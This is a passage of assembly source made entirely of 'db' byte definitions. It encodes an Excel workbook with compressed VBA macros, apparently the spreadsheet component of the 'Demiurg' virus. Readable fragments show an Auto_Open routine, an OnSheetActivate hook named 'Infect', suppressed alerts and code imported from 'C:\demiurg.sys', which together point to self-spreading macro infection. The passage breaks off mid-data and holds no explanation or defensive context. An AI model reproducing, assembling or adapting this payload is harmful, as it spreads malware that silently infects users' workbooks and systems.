db 000h, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
|
|||
|
db 03Fh, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
|
|||
|
db 03Fh, 0CEh, 05Ah, 055h, 000h, 002h, 000h, 00Ah
|
|||
|
db 000h, 000h, 002h, 00Eh, 0E6h, 00Fh, 000h, 03Eh
|
|||
|
db 002h, 012h, 000h, 0B6h, 006h, 0E6h, 004h, 000h
|
|||
|
db 040h, 0E6h, 00Bh, 000h, 01Dh, 000h, 00Fh, 000h
|
|||
|
db 003h, 0E6h, 006h, 000h, 001h, 0E6h, 007h, 000h
|
|||
|
db 0BAh, 001h, 00Bh, 000h, 008h, 000h, 000h, 054h
|
|||
|
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 00Ah
|
|||
|
db 0E6h, 031h, 000h, 001h, 016h, 001h, 000h, 000h
|
|||
|
db 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h, 004h
|
|||
|
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
|
|||
|
db 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h, 000h
|
|||
|
db 000h, 003h, 000h, 000h, 000h, 005h, 000h, 000h
|
|||
|
db 000h, 007h, 000h, 000h, 000h, 0E6h, 008h, 0FFh
|
|||
|
db 001h, 001h, 008h, 000h, 000h, 000h, 0E6h, 004h
|
|||
|
db 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h, 000h
|
|||
|
db 000h, 0AFh, 002h, 000h, 000h, 0F5h, 001h, 000h
|
|||
|
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 001h
|
|||
|
db 000h, 000h, 000h, 0B5h, 031h, 0B7h, 031h, 000h
|
|||
|
db 000h, 0FFh, 0FFh, 023h, 000h, 000h, 000h, 088h
|
|||
|
db 000h, 000h, 000h, 008h, 0E6h, 020h, 000h, 0FFh
|
|||
|
db 0FFh, 000h, 000h, 0CBh, 002h, 000h, 000h, 0D6h
|
|||
|
db 000h, 000h, 000h, 0D6h, 000h, 000h, 000h, 01Fh
|
|||
|
db 003h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
|
|||
|
db 004h, 000h, 0DFh, 000h, 0FFh, 0FFh, 0E6h, 004h
|
|||
|
db 000h, 00Ch, 000h, 0E6h, 058h, 0FFh, 044h, 000h
|
|||
|
db 069h, 000h, 065h, 000h, 073h, 000h, 065h, 000h
|
|||
|
db 041h, 000h, 072h, 000h, 062h, 000h, 065h, 000h
|
|||
|
db 069h, 000h, 074h, 000h, 073h, 000h, 06Dh, 000h
|
|||
|
db 061h, 000h, 070h, 000h, 070h, 000h, 065h, 0E6h
|
|||
|
db 01Fh, 000h, 024h, 000h, 002h, 001h, 007h, 000h
|
|||
|
db 000h, 000h, 0E6h, 008h, 0FFh, 0E6h, 024h, 000h
|
|||
|
db 02Bh, 000h, 000h, 000h, 0CAh, 003h, 0E6h, 006h
|
|||
|
db 000h, 054h, 000h, 061h, 000h, 062h, 000h, 065h
|
|||
|
db 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h
|
|||
|
db 0E6h, 031h, 000h, 012h, 000h, 002h, 001h, 006h
|
|||
|
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 0E6h, 024h, 000h, 03Bh, 000h, 000h
|
|||
|
db 000h, 0BFh, 003h, 0E6h, 006h, 000h, 044h, 000h
|
|||
|
db 065h, 000h, 06Dh, 000h, 069h, 000h, 075h, 000h
|
|||
|
db 072h, 000h, 067h, 0E6h, 033h, 000h, 010h, 000h
|
|||
|
db 002h, 001h, 008h, 000h, 000h, 000h, 0E6h, 008h
|
|||
|
db 0FFh, 0E6h, 024h, 000h, 04Ah, 000h, 000h, 000h
|
|||
|
db 01Fh, 007h, 0E6h, 006h, 000h, 05Fh, 000h, 056h
|
|||
|
db 000h, 042h, 000h, 041h, 000h, 05Fh, 000h, 050h
|
|||
|
db 000h, 052h, 000h, 04Fh, 000h, 04Ah, 000h, 045h
|
|||
|
db 000h, 043h, 000h, 054h, 0E6h, 029h, 000h, 01Ah
|
|||
|
db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h
|
|||
|
db 000h, 067h, 000h, 000h, 000h, 059h, 00Ch, 0E6h
|
|||
|
db 006h, 000h, 0E6h, 028h, 0FFh, 028h, 000h, 000h
|
|||
|
db 000h, 002h, 000h, 053h, 04Ch, 0E6h, 004h, 0FFh
|
|||
|
db 000h, 000h, 001h, 000h, 053h, 010h, 0E6h, 004h
|
|||
|
db 0FFh, 000h, 000h, 001h, 000h, 053h, 094h, 0E6h
|
|||
|
db 004h, 0FFh, 0E6h, 004h, 000h, 002h, 03Ch, 0E6h
|
|||
|
db 004h, 0FFh, 000h, 000h, 0FFh, 0FFh, 001h, 001h
|
|||
|
db 0E6h, 004h, 000h, 001h, 000h, 04Eh, 000h, 030h
|
|||
|
db 000h, 07Bh, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 032h, 000h, 030h, 000h, 038h, 000h, 031h
|
|||
|
db 000h, 039h, 000h, 02Dh, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 02Dh
|
|||
|
db 000h, 043h, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 034h
|
|||
|
db 000h, 036h, 000h, 07Dh, 0E6h, 007h, 000h, 0DFh
|
|||
|
db 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
|
|||
|
db 038h, 000h, 000h, 000h, 002h, 081h, 0FEh, 0E6h
|
|||
|
db 009h, 0FFh, 028h, 0E6h, 005h, 000h, 0FFh, 0FFh
|
|||
|
db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 074h, 000h
|
|||
|
db 020h, 000h, 01Dh, 000h, 000h, 000h, 024h, 000h
|
|||
|
db 000h, 000h, 0E6h, 004h, 0FFh, 048h, 0E6h, 005h
|
|||
|
db 000h, 0FFh, 0FFh, 000h, 000h, 001h, 0E6h, 007h
|
|||
|
db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 004h, 000h, 0E6h
|
|||
|
db 010h, 0FFh, 0E6h, 004h, 000h, 0E6h, 010h, 0FFh
|
|||
|
db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 0E6h, 004h
|
|||
|
db 000h, 0E6h, 01Eh, 0FFh, 04Dh, 045h, 000h, 000h
|
|||
|
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
|
|||
|
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
|
|||
|
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 000h, 000h
|
|||
|
db 0E6h, 004h, 0FFh, 001h, 001h, 008h, 000h, 000h
|
|||
|
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
|
|||
|
db 001h, 0A7h, 0B0h, 000h, 041h, 074h, 074h, 072h
|
|||
|
db 069h, 062h, 075h, 074h, 000h, 065h, 020h, 056h
|
|||
|
db 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h, 020h
|
|||
|
db 03Dh, 020h, 022h, 044h, 069h, 065h, 000h, 073h
|
|||
|
db 065h, 041h, 072h, 062h, 065h, 069h, 074h, 000h
|
|||
|
db 073h, 06Dh, 061h, 070h, 070h, 065h, 022h, 00Dh
|
|||
|
db 022h, 00Ah, 00Ah, 0A0h, 042h, 061h, 073h, 002h
|
|||
|
db 0A0h, 030h, 07Bh, 000h, 030h, 030h, 030h, 032h
|
|||
|
db 030h, 038h, 031h, 039h, 0EAh, 02Dh, 000h, 010h
|
|||
|
db 030h, 003h, 008h, 043h, 000h, 014h, 002h, 012h
|
|||
|
db 001h, 024h, 020h, 030h, 030h, 034h, 036h, 07Dh
|
|||
|
db 00Dh, 07Ch, 043h, 072h, 040h, 065h, 061h, 074h
|
|||
|
db 061h, 062h, 06Ch, 001h, 086h, 046h, 010h, 061h
|
|||
|
db 06Ch, 073h, 065h, 00Ch, 05Eh, 050h, 072h, 065h
|
|||
|
db 020h, 064h, 065h, 063h, 06Ch, 061h, 000h, 006h
|
|||
|
db 049h, 064h, 011h, 000h, 090h, 054h, 072h, 075h
|
|||
|
db 00Dh, 022h, 045h, 078h, 070h, 008h, 06Fh, 073h
|
|||
|
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 000h
|
|||
|
db 06Ch, 061h, 074h, 065h, 044h, 065h, 072h, 069h
|
|||
|
db 006h, 076h, 002h, 024h, 011h, 065h, 043h, 075h
|
|||
|
db 073h, 074h, 06Fh, 018h, 06Dh, 069h, 07Ah, 004h
|
|||
|
db 044h, 003h, 032h, 0E6h, 036h, 000h, 001h, 016h
|
|||
|
db 001h, 000h, 000h, 0B6h, 000h, 0FFh, 0FFh, 001h
|
|||
|
db 001h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
|
|||
|
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 034h, 000h
|
|||
|
db 010h, 000h, 000h, 000h, 003h, 000h, 000h, 000h
|
|||
|
db 005h, 000h, 000h, 000h, 007h, 000h, 000h, 000h
|
|||
|
db 0E6h, 008h, 0FFh, 001h, 001h, 008h, 000h, 000h
|
|||
|
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
|
|||
|
db 0DEh, 000h, 000h, 000h, 0AFh, 002h, 000h, 000h
|
|||
|
db 0F5h, 001h, 000h, 000h, 0E6h, 004h, 0FFh, 0E6h
|
|||
|
db 004h, 000h, 001h, 000h, 000h, 000h, 0B5h, 031h
|
|||
|
db 0B9h, 031h, 000h, 000h, 0FFh, 0FFh, 023h, 000h
|
|||
|
db 000h, 000h, 088h, 000h, 000h, 000h, 008h, 0E6h
|
|||
|
db 020h, 000h, 0FFh, 0FFh, 000h, 000h, 0CBh, 002h
|
|||
|
db 000h, 000h, 0D6h, 000h, 000h, 000h, 0D6h, 000h
|
|||
|
db 000h, 000h, 01Fh, 003h, 0E6h, 004h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 0E6h, 004h, 000h, 0DFh, 000h, 0FFh
|
|||
|
db 0FFh, 0E6h, 004h, 000h, 00Ch, 000h, 0E6h, 080h
|
|||
|
db 0FFh, 028h, 000h, 000h, 000h, 002h, 000h, 053h
|
|||
|
db 04Ch, 0E6h, 004h, 0FFh, 000h, 000h, 001h, 000h
|
|||
|
db 053h, 010h, 0E6h, 004h, 0FFh, 000h, 000h, 001h
|
|||
|
db 000h, 053h, 094h, 0E6h, 004h, 0FFh, 0E6h, 004h
|
|||
|
db 000h, 002h, 03Ch, 0E6h, 004h, 0FFh, 000h, 000h
|
|||
|
db 0FFh, 0FFh, 001h, 001h, 0E6h, 004h, 000h, 001h
|
|||
|
db 000h, 04Eh, 000h, 030h, 000h, 07Bh, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 032h, 000h, 030h
|
|||
|
db 000h, 038h, 000h, 032h, 000h, 030h, 000h, 02Dh
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 02Dh, 000h, 043h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 034h, 000h, 036h, 000h, 07Dh
|
|||
|
db 0E6h, 007h, 000h, 0DFh, 0E6h, 004h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 001h, 001h, 038h, 000h, 000h, 000h
|
|||
|
db 002h, 081h, 0FEh, 0E6h, 009h, 0FFh, 028h, 0E6h
|
|||
|
db 005h, 000h, 0FFh, 0FFh, 0E6h, 008h, 000h, 0E6h
|
|||
|
db 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h, 000h
|
|||
|
db 000h, 024h, 000h, 000h, 000h, 0E6h, 004h, 0FFh
|
|||
|
db 048h, 0E6h, 005h, 000h, 0FFh, 0FFh, 000h, 000h
|
|||
|
db 001h, 0E6h, 007h, 000h, 0E6h, 00Ch, 0FFh, 0E6h
|
|||
|
db 004h, 000h, 0E6h, 010h, 0FFh, 0E6h, 004h, 000h
|
|||
|
db 0E6h, 010h, 0FFh, 0E6h, 008h, 000h, 0E6h, 008h
|
|||
|
db 0FFh, 0E6h, 004h, 000h, 0E6h, 01Eh, 0FFh, 04Dh
|
|||
|
db 045h, 000h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h
|
|||
|
db 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
|
|||
|
db 001h, 001h, 0E6h, 040h, 000h, 0FEh, 0CAh, 001h
|
|||
|
db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
|
|||
|
db 008h, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 078h
|
|||
|
db 000h, 000h, 000h, 001h, 09Ch, 0B0h, 000h, 041h
|
|||
|
db 074h, 074h, 072h, 069h, 062h, 075h, 074h, 000h
|
|||
|
db 065h, 020h, 056h, 042h, 05Fh, 04Eh, 061h, 06Dh
|
|||
|
db 000h, 065h, 020h, 03Dh, 020h, 022h, 054h, 061h
|
|||
|
db 062h, 000h, 065h, 06Ch, 06Ch, 065h, 031h, 022h
|
|||
|
db 00Dh, 00Ah, 011h, 00Ah, 0F8h, 042h, 061h, 073h
|
|||
|
db 002h, 07Ch, 030h, 07Bh, 030h, 000h, 030h, 030h
|
|||
|
db 032h, 030h, 038h, 032h, 030h, 02Dh, 03Bh, 000h
|
|||
|
db 020h, 004h, 008h, 043h, 000h, 014h, 002h, 01Ch
|
|||
|
db 001h, 024h, 030h, 030h, 008h, 034h, 036h, 07Dh
|
|||
|
db 00Dh, 07Ch, 043h, 072h, 065h, 061h, 010h, 074h
|
|||
|
db 061h, 062h, 06Ch, 001h, 086h, 046h, 061h, 06Ch
|
|||
|
db 004h, 073h, 065h, 00Ch, 0BCh, 050h, 072h, 065h
|
|||
|
db 064h, 065h, 048h, 063h, 06Ch, 061h, 000h, 006h
|
|||
|
db 049h, 064h, 000h, 087h, 054h, 004h, 072h, 075h
|
|||
|
db 00Dh, 022h, 045h, 078h, 070h, 06Fh, 073h, 002h
|
|||
|
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 06Ch
|
|||
|
db 061h, 080h, 074h, 065h, 044h, 065h, 072h, 069h
|
|||
|
db 076h, 002h, 024h, 001h, 011h, 065h, 043h, 075h
|
|||
|
db 073h, 074h, 06Fh, 06Dh, 069h, 006h, 07Ah, 004h
|
|||
|
db 088h, 003h, 032h, 000h, 001h, 016h, 001h, 000h
|
|||
|
db 001h, 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
|
|||
|
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
|
|||
|
db 0E6h, 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h
|
|||
|
db 000h, 000h, 003h, 000h, 000h, 000h, 005h, 000h
|
|||
|
db 000h, 000h, 007h, 000h, 000h, 000h, 0E6h, 008h
|
|||
|
db 0FFh, 001h, 001h, 008h, 000h, 000h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h
|
|||
|
db 000h, 000h, 037h, 003h, 000h, 000h, 0A5h, 001h
|
|||
|
db 000h, 000h, 0E6h, 004h, 0FFh, 002h, 000h, 000h
|
|||
|
db 000h, 001h, 000h, 000h, 000h, 0B5h, 031h, 0BBh
|
|||
|
db 031h, 000h, 000h, 0FFh, 0FFh, 003h, 0E6h, 007h
|
|||
|
db 000h, 002h, 0E6h, 020h, 000h, 0FFh, 0FFh, 000h
|
|||
|
db 000h, 053h, 003h, 000h, 000h, 0D6h, 000h, 000h
|
|||
|
db 000h, 0D6h, 000h, 000h, 000h, 0B7h, 005h, 0E6h
|
|||
|
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
|
|||
|
db 0DFh, 000h, 0FFh, 0FFh, 0E6h, 006h, 000h, 0E6h
|
|||
|
db 080h, 0FFh, 028h, 0E6h, 005h, 000h, 002h, 03Ch
|
|||
|
db 00Ch, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 002h
|
|||
|
db 03Ch, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 002h
|
|||
|
db 03Ch, 004h, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h
|
|||
|
db 002h, 03Ch, 008h, 000h, 0FFh, 0FFh, 000h, 000h
|
|||
|
db 0FFh, 0FFh, 001h, 001h, 0E6h, 006h, 000h, 0E8h
|
|||
|
db 005h, 0C0h, 038h, 003h, 000h, 0DFh, 0E6h, 004h
|
|||
|
db 000h, 050h, 000h, 000h, 000h, 001h, 001h, 010h
|
|||
|
db 001h, 000h, 000h, 00Bh, 012h, 01Eh, 002h, 080h
|
|||
|
db 0E6h, 006h, 000h, 060h, 0E6h, 004h, 000h, 0E6h
|
|||
|
db 008h, 0FFh, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh
|
|||
|
db 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh, 000h, 000h
|
|||
|
db 003h, 000h, 003h, 000h, 000h, 000h, 084h, 000h
|
|||
|
db 000h, 001h, 0E6h, 006h, 000h, 080h, 000h, 000h
|
|||
|
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 0C0h, 000h, 000h, 000h, 028h, 0E6h
|
|||
|
db 007h, 000h, 0E6h, 004h, 0FFh, 068h, 0FFh, 040h
|
|||
|
db 000h, 0E6h, 00Ah, 0FFh, 001h, 000h, 003h, 000h
|
|||
|
db 003h, 000h, 003h, 000h, 084h, 000h, 000h, 001h
|
|||
|
db 0E6h, 006h, 000h, 00Bh, 012h, 02Ah, 002h, 0E6h
|
|||
|
db 004h, 0FFh, 002h, 000h, 000h, 060h, 0E6h, 004h
|
|||
|
db 000h, 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh
|
|||
|
db 002h, 000h, 00Dh, 000h, 00Dh, 000h, 006h, 000h
|
|||
|
db 084h, 000h, 000h, 001h, 000h, 000h, 004h, 000h
|
|||
|
db 0E6h, 006h, 0FFh, 010h, 000h, 000h, 000h, 040h
|
|||
|
db 0E6h, 007h, 000h, 080h, 000h, 000h, 000h, 0E6h
|
|||
|
db 004h, 0FFh, 002h, 083h, 01Ch, 002h, 0E6h, 004h
|
|||
|
db 0FFh, 008h, 000h, 0FFh, 0FFh, 000h, 001h, 0E6h
|
|||
|
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h
|
|||
|
db 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h
|
|||
|
db 000h, 000h, 024h, 000h, 000h, 000h, 0E6h, 004h
|
|||
|
db 0FFh, 0F0h, 000h, 000h, 000h, 002h, 000h, 002h
|
|||
|
db 0E6h, 00Fh, 000h, 0E6h, 010h, 0FFh, 080h, 000h
|
|||
|
db 000h, 000h, 0E6h, 018h, 0FFh, 0D8h, 0E6h, 00Bh
|
|||
|
db 000h, 008h, 000h, 004h, 000h, 0E6h, 004h, 0FFh
|
|||
|
db 0E6h, 004h, 000h, 0E6h, 018h, 0FFh, 004h, 000h
|
|||
|
db 040h, 000h, 000h, 000h, 04Dh, 045h, 000h, 000h
|
|||
|
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
|
|||
|
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
|
|||
|
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 010h, 000h
|
|||
|
db 022h, 081h, 008h, 000h, 006h, 000h, 00Ch, 0E6h
|
|||
|
db 006h, 000h, 081h, 008h, 004h, 012h, 000h, 000h
|
|||
|
db 000h, 008h, 000h, 000h, 000h, 004h, 081h, 008h
|
|||
|
db 000h, 002h, 000h, 000h, 000h, 020h, 000h, 000h
|
|||
|
db 000h, 022h, 081h, 008h, 000h, 006h, 000h, 00Ch
|
|||
|
db 000h, 040h, 0E6h, 004h, 000h, 081h, 008h, 004h
|
|||
|
db 00Ah, 000h, 000h, 000h, 048h, 0E6h, 004h, 000h
|
|||
|
db 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh
|
|||
|
db 000h, 081h, 008h, 004h, 026h, 000h, 000h, 000h
|
|||
|
db 058h, 0E6h, 004h, 000h, 081h, 008h, 004h, 02Eh
|
|||
|
db 000h, 000h, 000h, 080h, 0E6h, 004h, 000h, 080h
|
|||
|
db 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh, 000h
|
|||
|
db 081h, 008h, 008h, 01Eh, 000h, 000h, 000h, 0B0h
|
|||
|
db 0E6h, 004h, 000h, 081h, 008h, 00Ch, 02Ch, 000h
|
|||
|
db 000h, 000h, 0D0h, 0E6h, 004h, 000h, 081h, 008h
|
|||
|
db 008h, 00Ah, 0E6h, 004h, 000h, 001h, 000h, 000h
|
|||
|
db 000h, 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h
|
|||
|
db 0FFh, 000h, 081h, 008h, 004h, 026h, 000h, 000h
|
|||
|
db 000h, 010h, 001h, 000h, 000h, 000h, 081h, 008h
|
|||
|
db 004h, 00Ah, 000h, 000h, 000h, 038h, 001h, 000h
|
|||
|
db 000h, 004h, 081h, 008h, 000h, 002h, 000h, 000h
|
|||
|
db 000h, 048h, 001h, 000h, 000h, 0E6h, 004h, 0FFh
|
|||
|
db 001h, 001h, 058h, 001h, 000h, 000h, 08Fh, 004h
|
|||
|
db 0E6h, 006h, 000h, 0AEh, 000h, 006h, 000h, 049h
|
|||
|
db 06Eh, 066h, 065h, 063h, 074h, 020h, 000h, 020h
|
|||
|
db 002h, 028h, 000h, 022h, 002h, 0E6h, 006h, 0FFh
|
|||
|
db 06Ch, 000h, 0FFh, 0FFh, 058h, 000h, 000h, 000h
|
|||
|
db 0AFh, 000h, 020h, 000h, 026h, 002h, 028h, 000h
|
|||
|
db 028h, 002h, 0FFh, 0FFh, 015h, 002h, 000h, 000h
|
|||
|
db 06Ch, 000h, 0FFh, 0FFh, 038h, 000h, 000h, 000h
|
|||
|
db 08Fh, 004h, 080h, 0E6h, 005h, 000h, 0AFh, 000h
|
|||
|
db 020h, 000h, 020h, 002h, 028h, 000h, 02Ch, 002h
|
|||
|
db 0E6h, 006h, 0FFh, 020h, 000h, 032h, 002h, 021h
|
|||
|
db 000h, 008h, 001h, 020h, 000h, 032h, 002h, 021h
|
|||
|
db 000h, 008h, 001h, 01Bh, 000h, 0A4h, 000h, 001h
|
|||
|
db 000h, 024h, 020h, 0FCh, 000h, 003h, 000h, 024h
|
|||
|
db 000h, 030h, 002h, 001h, 000h, 027h, 000h, 02Eh
|
|||
|
db 002h, 000h, 000h, 0AEh, 000h, 001h, 000h, 031h
|
|||
|
db 000h, 024h, 000h, 030h, 002h, 001h, 000h, 020h
|
|||
|
db 000h, 02Eh, 002h, 007h, 000h, 020h, 000h, 02Eh
|
|||
|
db 002h, 0AEh, 000h, 001h, 000h, 039h, 000h, 024h
|
|||
|
db 000h, 030h, 002h, 001h, 000h, 007h, 000h, 004h
|
|||
|
db 000h, 094h, 000h, 046h, 000h, 075h, 000h, 067h
|
|||
|
db 000h, 000h, 0F0h, 0F7h, 000h, 020h, 000h, 034h
|
|||
|
db 002h, 0F6h, 000h, 0A4h, 000h, 001h, 000h, 020h
|
|||
|
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
|
|||
|
db 000h, 038h, 002h, 021h, 000h, 03Ah, 002h, 08Bh
|
|||
|
db 000h, 000h, 000h, 020h, 000h, 034h, 002h, 020h
|
|||
|
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 025h
|
|||
|
db 000h, 038h, 002h, 001h, 000h, 021h, 000h, 008h
|
|||
|
db 001h, 0AEh, 000h, 007h, 000h, 044h, 065h, 06Dh
|
|||
|
db 069h, 075h, 072h, 067h, 000h, 005h, 000h, 094h
|
|||
|
db 000h, 046h, 000h, 075h, 000h, 067h, 000h, 0F8h
|
|||
|
db 000h, 000h, 000h, 0F7h, 000h, 020h, 000h, 034h
|
|||
|
db 002h, 0F6h, 000h, 0C0h, 000h, 000h, 0A0h, 048h
|
|||
|
db 037h, 044h, 000h, 0AEh, 000h, 00Eh, 000h, 043h
|
|||
|
db 03Ah, 05Ch, 064h, 065h, 06Dh, 069h, 075h, 072h
|
|||
|
db 067h, 02Eh, 073h, 079h, 073h, 01Dh, 000h, 020h
|
|||
|
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
|
|||
|
db 000h, 038h, 002h, 042h, 040h, 03Ch, 002h, 001h
|
|||
|
db 000h, 000h, 000h, 020h, 000h, 032h, 002h, 042h
|
|||
|
db 040h, 03Eh, 002h, 0E6h, 004h, 000h, 021h, 000h
|
|||
|
db 000h, 0A0h, 06Ch, 000h, 0FFh, 0FFh, 0A8h, 000h
|
|||
|
db 000h, 000h, 0E6h, 004h, 0FFh, 0A8h, 000h, 000h
|
|||
|
db 000h, 001h, 064h, 0B1h, 000h, 041h, 074h, 074h
|
|||
|
db 072h, 069h, 062h, 075h, 074h, 000h, 065h, 020h
|
|||
|
db 056h, 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h
|
|||
|
db 020h, 03Dh, 020h, 022h, 044h, 065h, 06Dh, 000h
|
|||
|
db 069h, 075h, 072h, 067h, 022h, 00Dh, 00Ah, 053h
|
|||
|
db 000h, 075h, 062h, 020h, 041h, 075h, 074h, 06Fh
|
|||
|
db 05Fh, 000h, 04Fh, 070h, 065h, 06Eh, 028h, 029h
|
|||
|
db 00Dh, 00Ah, 002h, 020h, 000h, 000h, 041h, 070h
|
|||
|
db 070h, 06Ch, 069h, 063h, 000h, 061h, 074h, 069h
|
|||
|
db 06Fh, 06Eh, 02Eh, 04Fh, 06Eh, 000h, 053h, 068h
|
|||
|
db 065h, 065h, 074h, 041h, 063h, 074h, 018h, 069h
|
|||
|
db 076h, 061h, 000h, 08Ah, 000h, 07Ah, 049h, 06Eh
|
|||
|
db 066h, 008h, 065h, 063h, 074h, 000h, 078h, 045h
|
|||
|
db 06Eh, 064h, 020h, 00Fh, 000h, 080h, 003h, 08Ah
|
|||
|
db 003h, 02Ah, 011h, 084h, 044h, 069h, 073h, 070h
|
|||
|
db 000h, 06Ch, 061h, 079h, 041h, 06Ch, 065h, 072h
|
|||
|
db 074h, 002h, 073h, 000h, 07Eh, 046h, 061h, 06Ch
|
|||
|
db 073h, 065h, 00Dh, 002h, 00Ah, 003h, 06Bh, 06Ch
|
|||
|
db 061h, 073h, 074h, 063h, 068h, 004h, 061h, 072h
|
|||
|
db 000h, 017h, 041h, 073h, 063h, 028h, 04Dh, 010h
|
|||
|
db 069h, 064h, 024h, 028h, 002h, 06Ch, 065h, 057h
|
|||
|
db 06Fh, 080h, 072h, 06Bh, 062h, 06Fh, 06Fh, 06Bh
|
|||
|
db 02Eh, 001h, 0B5h, 018h, 02Ch, 020h, 04Ch, 000h
|
|||
|
db 09Fh, 010h, 018h, 029h, 02Ch, 020h, 044h, 031h
|
|||
|
db 029h, 004h, 0B7h, 049h, 066h, 020h, 001h, 043h
|
|||
|
db 022h, 080h, 031h, 022h, 029h, 020h, 03Ch, 03Dh
|
|||
|
db 020h, 006h, 05Ah, 05Eh, 041h, 080h, 053h, 006h
|
|||
|
db 006h, 000h, 00Ch, 002h, 012h, 039h, 000h, 012h
|
|||
|
db 054h, 000h, 068h, 065h, 06Eh, 020h, 045h, 078h
|
|||
|
db 069h, 074h, 007h, 003h, 063h, 083h, 048h, 081h
|
|||
|
db 080h, 046h, 06Fh, 072h, 020h, 069h, 041h, 000h
|
|||
|
db 049h, 031h, 020h, 054h, 06Fh, 020h, 08Ch, 03Ah
|
|||
|
db 056h, 020h, 042h, 050h, 072h, 06Fh, 06Ah, 080h
|
|||
|
db 080h, 02Eh, 056h, 000h, 042h, 043h, 06Fh, 06Dh
|
|||
|
db 070h, 06Fh, 06Eh, 065h, 000h, 06Eh, 074h, 073h
|
|||
|
db 02Eh, 063h, 06Fh, 075h, 06Eh, 07Eh, 074h, 087h
|
|||
|
db 020h, 081h, 022h, 081h, 047h, 081h, 09Bh, 007h
|
|||
|
db 065h, 093h, 01Dh, 028h, 0DCh, 069h, 029h, 002h
|
|||
|
db 072h, 000h, 038h, 006h, 0CDh, 020h, 08Ch, 04Dh
|
|||
|
db 081h, 027h, 081h, 081h, 001h, 04Eh, 065h, 078h
|
|||
|
db 074h, 020h, 069h, 085h, 09Eh, 005h, 023h, 04Dh
|
|||
|
db 049h, 000h, 029h, 072h, 074h, 020h, 028h, 022h
|
|||
|
db 010h, 043h, 03Ah, 05Ch, 064h, 083h, 07Eh, 02Eh
|
|||
|
